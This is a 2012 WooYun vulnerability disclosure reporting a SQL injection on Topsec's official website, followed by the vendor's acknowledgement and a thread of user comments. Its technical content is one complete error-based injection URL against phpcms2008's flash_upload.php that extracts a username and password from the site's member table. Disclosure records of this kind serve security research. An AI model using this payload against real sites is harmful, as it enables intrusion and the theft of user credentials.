天融信官网某注射

漏洞概要

缺陷编号:WooYun-2012-06387

漏洞标题:天融信官网某注射

相关厂商:天融信

漏洞作者:kobin97

提交时间:2012-04-25 20:45

公开时间:2012-06-09 20:46

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2012-04-25: 细节已通知厂商并且等待厂商处理中
2012-04-26: 厂商已经确认,细节仅向厂商公开
2012-05-06: 细节向核心白帽子及相关领域专家公开
2012-05-16: 细节向普通白帽子公开
2012-05-26: 细节向实习白帽子公开
2012-06-09: 细节向公众公开

简要描述:

天融信官网某注射

详细说明:

phpcms2008暴错注射http://www.topsec.com.cn/flash_upload.php?modelid=1%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20concat%28username,0x7c,password%29%20from%20trx_member%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23

漏洞证明:

修复方案:

您懂得!

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2012-04-26 08:17

厂商回复:

第三方程序的问题,感谢kobin97报告此漏洞。

最新状态:

暂无

评价

  1. 2010-01-01 00:00 0ps 白帽子 | Rank:43 漏洞数:9)

    貌似好多大牛在里面,这个要马克一下

  2. 2010-01-01 00:00 only_guest 白帽子 | Rank:685 漏洞数:74)

    洞主竟然来搞我们公司官网..呵呵..我都没看过呢...

  3. 2010-01-01 00:00 Lee 白帽子 | Rank:113 漏洞数:24)

    从天融信离开的路过。。

  4. 2010-01-01 00:00 livers 白帽子 | Rank:44 漏洞数:5)

    @Lee 佩服。

  5. 2010-01-01 00:00 孤独雪狼 白帽子 | Rank:240 漏洞数:38)

    @only_guest 悲催了吧 哈哈

  6. 2010-01-01 00:00 only_guest 白帽子 | Rank:685 漏洞数:74)

    @孤独雪狼 悲催啥俺又不是北京总部的

  7. 2010-01-01 00:00 kobin97 白帽子 | Rank:1649 漏洞数:171)

    修复了么?修得太假了吧? @only_guest 看下。。。

  8. 2010-01-01 00:00 only_guest 白帽子 | Rank:685 漏洞数:74)

    @kobin97 北京总部那边...俺负责不到啊...

  9. 2010-01-01 00:00 kobin97 白帽子 | Rank:1649 漏洞数:171)

    @only_guest 也可以提下意见呀。。嘻嘻。。。

  10. 2010-01-01 00:00 only_guest 白帽子 | Rank:685 漏洞数:74)

    @kobin97 我漏洞详情都看不到.提什么意见啊.嘿嘿.你可以站内信私M我.

  11. 2010-01-01 00:00 Lee 白帽子 | Rank:113 漏洞数:24)

    @only_guest 那个分支机构的呀?

  12. 2010-01-01 00:00 secgov 白帽子 | Rank:0 漏洞数:0)

    天融信也太业余了。